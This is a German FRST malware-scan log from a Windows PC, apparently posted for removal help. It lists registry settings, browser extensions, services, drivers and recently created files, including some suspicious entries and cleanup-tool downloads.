ShellIconOverlayIdentifiers-x32: [1EldosIconOverlay] -> {56D36CD8-63C4-425D-B03D-CC30C1711EA4} => C:\Windows\SysWow64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\SysWOW64\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation) GroupPolicyUsers\S-1-5-21-682121585-3582832733-1082443493-1008\User: Beschränkung <======= ACHTUNG ==================== Internet (Nicht auf der Ausnahmeliste) ==================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.) Tcpip\Parameters: [DhcpNameServer] 192.168.2.1 Tcpip\..\Interfaces\{3B1D22AF-F97D-45ED-B09F-5CAD2B93F90B}: [DhcpNameServer] 192.168.2.1 Internet Explorer: ================== HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG HKU\S-1-5-21-682121585-3582832733-1082443493-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\SOFTWARE\Policies\Microsoft\Internet Explorer: Beschränkung <======= ACHTUNG HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch HKU\S-1-5-21-682121585-3582832733-1082443493-1007\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-682121585-3582832733-1082443493-1007-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://de.msn.com/?ocid=iehp SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-682121585-3582832733-1082443493-1009-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {EAE34A3D-27B1-4773-A9EC-88E5068C2C50} URL = hxxps://www.google.com/search?q={searchTerms} BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2013-10-08] (Oracle Corporation) BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2013-10-08] (Oracle Corporation) Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Toolbar: HKU\S-1-5-21-682121585-3582832733-1082443493-1008-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> Kein Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Keine Datei Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies) Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation) Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation) FireFox: ======== FF ProfilePath: C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default FF Homepage: hxxps://www.malwarebytes.org/restorebrowser/ FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] () FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-10-01] () FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2013-10-08] (Oracle Corporation) FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation) FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-10-23] (NVIDIA Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-16] (Google Inc.) FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2013-09-23] (VideoLAN) FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.) FF Extension: Cliqz - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\cliqz@cliqz.com.xpi [2014-11-08] FF Extension: Adblock Plus - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2014-03-22] FF HKLM\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKLM-x32\...\Firefox\Extensions: [ffpwdman@bitdefender.com] - C:\Program Files\Bitdefender\Bitdefender\Antispam32\ffpwdman FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com FF HKU\S-1-5-21-682121585-3582832733-1082443493-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Firefox\Extensions: [cliqz@cliqz.com] - C:\Users\Kenny G\AppData\Roaming\Mozilla\Firefox\Profiles\8natfymg.default\extensions\cliqz@cliqz.com Chrome: ======= CHR StartupUrls: Profile 2 -> "hxxps://www.google.de/" CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-02-16] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-02-16] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-02-16] CHR Extension: (Bitdefender Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-02-16] CHR Extension: (Google Search) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-02-16] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-16] CHR Extension: (Gmail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-02-16] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1 CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-09-15] CHR Extension: (Store) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ccahoghmggldkcdjiebjkidpfongdfbl [2014-06-26] CHR Extension: (Google Wallet) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-26] CHR Profile: C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2 CHR Extension: (Google Präsentationen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-10-03] CHR Extension: (Google Docs) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2014-10-03] CHR Extension: (Google Drive) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-10-03] CHR Extension: (YouTube) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-10-03] CHR Extension: (Google-Suche) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-10-03] CHR Extension: (ZenMate Security, Privacy & Unblock VPN) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2015-07-27] CHR Extension: (Google Tabellen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-10-03] CHR Extension: (Google Text & Tabellen Offline) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-09-18] CHR Extension: (Chrome Hotword Shared Module) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\lccekmodgklaepjeofjdjpbminllajkg [2015-03-26] CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-10-03] CHR Extension: (Google Mail) - C:\Users\Kenny G\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-10-03] CHR HKLM-x32\...\Chrome\Extension: [ccahoghmggldkcdjiebjkidpfongdfbl] - <kein Path/update_url> ==================== Dienste (Nicht auf der Ausnahmeliste) ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R2 avgfws; C:\Program Files (x86)\AVG\AVG2015\avgfws.exe [1560592 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3637160 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [335656 2015-08-24] (AVG Technologies CZ, s.r.o.) R2 CGVPNCliService; C:\Program Files\CyberGhost 5\Service.exe [63968 2015-05-21] (CyberGhost S.R.L) R3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1268568 2015-06-18] (Disc Soft Ltd) S2 MBAMService; C:\Program Files (x86)\ Malwarebytes Anti-Malware \mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation) R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [15122208 2013-10-18] (NVIDIA Corporation) R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2014-01-15] () S2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation) R2 WtuSystemSupport; C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe [1205136 2015-08-26] () S2 LavasoftTcpService; C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe [X] S2 SearchProtectionService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe [X] R2 zuroluxy; C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---\knsl4AC.tmpfs [X] ===================== Treiber (Nicht auf der Ausnahmeliste) ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [162784 2015-03-11] (AVG Technologies CZ, s.r.o.) R1 Avgfwfd; C:\Windows\System32\DRIVERS\avgfwd6a.sys [77760 2015-07-09] (AVG Technologies CZ, s.r.o.) R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [313264 2015-08-19] (AVG Technologies CZ, s.r.o.) R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [297904 2015-08-19] (AVG Technologies CZ, s.r.o.) R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [259040 2015-06-16] (AVG Technologies CZ, s.r.o.) R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [378336 2015-05-07] (AVG Technologies CZ, s.r.o.) R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [250800 2015-08-04] (AVG Technologies CZ, s.r.o.) R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [40928 2015-03-20] (AVG Technologies CZ, s.r.o.) R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [300464 2015-08-04] (AVG Technologies CZ, s.r.o.) R1 cbfs3; C:\Windows\system32\drivers\cbfs3.sys [352144 2012-04-09] (EldoS Corporation) R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2015-09-19] (Disc Soft Ltd) S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation) R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [113880 2015-09-23] (Malwarebytes Corporation) S3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2015-06-18] (Malwarebytes Corporation) R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [8192 2005-03-29] () R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [39200 2013-09-28] (NVIDIA Corporation) R0 SI3132; C:\Windows\System32\DRIVERS\SI3132.sys [90664 2007-10-03] (Silicon Image, Inc) R0 SiFilter; C:\Windows\System32\DRIVERS\SiWinAcc.sys [22056 2007-10-03] (Silicon Image, Inc) R0 SiRemFil; C:\Windows\System32\DRIVERS\SiRemFil.sys [17448 2007-10-03] (Silicon Image, Inc) S3 catchme; \??\C:\ComboFix\catchme.sys [X] ==================== NetSvcs (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Ein Monat: Erstellte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2015-09-23 04:59 - 2015-09-23 04:59 - 00000000 ____D C:\Users\Kenny G\Downloads\FRST-OlderVersion 2015-09-23 04:58 - 2015-09-23 04:58 - 00068936 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT 2015-09-22 06:36 - 2015-09-22 06:36 - 00001583 _____ C:\Users\Kenny G\Desktop\neu.txt 2015-09-21 18:38 - 2015-09-21 18:38 - 00028509 _____ C:\ComboFix.txt 2015-09-21 18:13 - 2011-06-26 08:45 - 00256000 _____ C:\Windows\PEV.exe 2015-09-21 18:13 - 2010-11-07 19:20 - 00208896 _____ C:\Windows\MBR.exe 2015-09-21 18:13 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00098816 _____ C:\Windows\sed.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00080412 _____ C:\Windows\grep.exe 2015-09-21 18:13 - 2000-08-31 02:00 - 00068096 _____ C:\Windows\zip.exe 2015-09-21 18:12 - 2015-09-21 18:38 - 00000000 ____D C:\Qoobox 2015-09-21 18:12 - 2015-09-21 18:36 - 00000000 ____D C:\Windows\erdnt 2015-09-21 18:10 - 2015-09-21 18:10 - 05635484 ____R (Swearware) C:\Users\Kenny G\Downloads\ComboFix.exe 2015-09-20 19:56 - 2015-09-20 19:56 - 00000000 _____ C:\Users\Kenny G\Desktop\Neues Textdokument.txt 2015-09-20 19:46 - 2015-09-20 19:46 - 00040674 _____ C:\Users\Kenny G\Desktop\AVG log.csv 2015-09-20 19:42 - 2015-09-20 19:35 - 00058541 _____ C:\Users\Kenny G\Desktop\FRST.txt 2015-09-20 19:42 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Desktop\Addition.txt 2015-09-20 19:42 - 2015-09-20 18:20 - 00054932 _____ C:\Users\Kenny G\Desktop\mbam-log-2015-09-20 (17-46-10).xml 2015-09-20 19:29 - 2015-09-20 19:30 - 00032570 _____ C:\Users\Kenny G\Desktop\GMER.txt 2015-09-20 19:19 - 2015-09-20 19:19 - 00380416 _____ C:\Users\Kenny G\Downloads\Gmer-19357.exe 2015-09-20 19:17 - 2015-09-20 19:35 - 00044699 _____ C:\Users\Kenny G\Downloads\Addition.txt 2015-09-20 19:16 - 2015-09-23 04:59 - 00022927 _____ C:\Users\Kenny G\Downloads\FRST.txt 2015-09-20 19:15 - 2015-09-23 04:59 - 00000000 ____D C:\FRST 2015-09-20 19:14 - 2015-09-23 04:59 - 02192384 _____ (Farbar) C:\Users\Kenny G\Downloads\FRST64.exe 2015-09-20 19:14 - 2015-09-20 19:14 - 00000476 _____ C:\Users\Kenny G\Downloads\defogger_disable.log 2015-09-20 19:14 - 2015-09-20 19:14 - 00000000 _____ C:\Users\Kenny G\defogger_reenable 2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe 2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte 2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe 2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt 2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe 2015-09-20 17:43 - 2015-09-23 04:58 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe 2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe 2015-09-19 17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover 2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe 2015-09-19 17:11 - 2015-09-20 17:29 - 00000584 _____ C:\task.vbs 2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT 2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders 2015-09-19 16:02 - 2015-07-29 09:23 - 00000000 ____D C:\Users\Kenny G\Desktop\Steuerungs- und Regeltechnik 2015-09-19 15:37 - 2015-09-19 15:37 - 00001494 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2015-09-19 12:25 - 2015-09-19 12:25 - 00000000 ___RD C:\MSOCache 2015-09-19 12:24 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Disc_Soft_Ltd 2015-09-19 12:21 - 2015-09-21 19:35 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\DAEMON Tools Lite 2015-09-19 12:21 - 2015-09-19 12:23 - 00000000 ____D C:\Program Files\DAEMON Tools Lite 2015-09-19 12:21 - 2015-09-19 12:21 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys 2015-09-19 12:21 - 2015-09-19 12:21 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite 2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913--- 2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak 2015-09-19 12:12 - 2015-09-20 01:26 - 00000000 ____D C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579--- 2015-09-19 12:06 - 2015-09-19 12:12 - 00000000 ____D C:\ProgramData\Microsoft Toolkit 2015-09-19 11:42 - 2015-09-19 15:43 - 00000000 ____D C:\Users\Kenny G\Desktop\Neuer Ordner (3) 2015-09-19 11:35 - 2015-09-19 11:38 - 55791130 _____ C:\Users\Kenny G\Downloads\MS-PowerPoint-2013-ISO-and-Activator.zip 2015-09-19 11:07 - 2015-09-19 11:07 - 00000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform 2015-09-19 11:06 - 2015-09-19 16:06 - 00000000 ____D C:\ProgramData\Microsoft Help 2015-09-19 11:06 - 2015-09-19 11:06 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Microsoft Help 2015-09-13 21:57 - 2015-09-13 22:26 - 00000000 ____D C:\Users\Kenny G\Desktop\USB Lieder 2015-09-13 12:25 - 2015-09-13 12:30 - 327964808 _____ (Microsoft Corporation) C:\Users\Kenny G\Downloads\X16-32694.exe 2015-09-01 22:40 - 2015-09-01 22:40 - 00001666 _____ C:\Users\Kenny G\Desktop\Traktor.exe - Verknüpfung.lnk 2015-09-01 21:50 - 2015-09-01 21:58 - 241712938 _____ C:\Users\Kenny G\Downloads\Traktor_2_290_PC.zip 2015-09-01 21:43 - 2015-09-01 21:43 - 01260832 _____ C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe 2015-09-01 20:31 - 2015-09-01 20:31 - 00000000 ____D C:\Backup 2015-09-01 20:20 - 2015-08-07 22:21 - 00000000 ____D C:\Users\Kenny G\Desktop\Native.Instruments.TRAKTOR.2.v2.9.0.x86.x64-CHAOS 2015-08-31 23:34 - 2015-09-01 20:19 - 527315694 _____ C:\Users\Kenny G\Downloads\2.9.0.x86.x64-CHAOS.rar 2015-08-29 20:33 - 2015-08-29 20:34 - 00000000 ____D C:\ProgramData\Package Cache 2015-08-29 19:48 - 2015-09-21 19:34 - 00000000 ____D C:\Users\Kenny G\Desktop\Alles 2015-08-29 16:06 - 2015-08-30 01:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox ==================== Ein Monat: Geänderte Dateien und Ordner ======== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.) 2015-09-23 04:54 - 2015-05-19 19:27 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job 2015-09-23 04:52 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2015-09-23 04:52 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2015-09-23 04:47 - 2013-10-01 21:23 - 01158110 _____ C:\Windows\WindowsUpdate.log 2015-09-23 04:44 - 2015-06-01 12:52 - 00000000 ____D C:\ProgramData\MFAData 2015-09-23 04:40 - 2015-05-19 19:27 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job 2015-09-21 18:38 - 2009-07-14 05:20 - 00000000 __RHD C:\Users\Default 2015-09-21 18:37 - 2009-07-14 19:58 - 00696832 _____ C:\Windows\system32\perfh007.dat 2015-09-21 18:37 - 2009-07-14 19:58 - 00148128 _____ C:\Windows\system32\perfc007.dat 2015-09-21 18:37 - 2009-07-14 07:13 - 01613340 _____ C:\Windows\system32\PerfStringBackup.INI 2015-09-21 18:32 - 2009-07-14 04:34 - 00000215 _____ C:\Windows\system.ini 2015-09-21 18:31 - 2013-11-03 19:09 - 00000000 ____D C:\ProgramData\NVIDIA 2015-09-21 18:31 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT 2015-09-20 19:14 - 2013-10-01 21:24 - 00000000 ____D C:\Users\Kenny G 2015-09-20 18:21 - 2015-06-01 11:16 - 00000000 ____D C:\AdwCleaner 2015-09-20 18:07 - 2015-08-07 11:34 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Lavasoft 2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\ProgramData\Lavasoft 2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\Program Files (x86)\Lavasoft 2015-09-20 03:16 - 2013-10-02 12:15 - 00000000 ____D C:\Users\Kenny 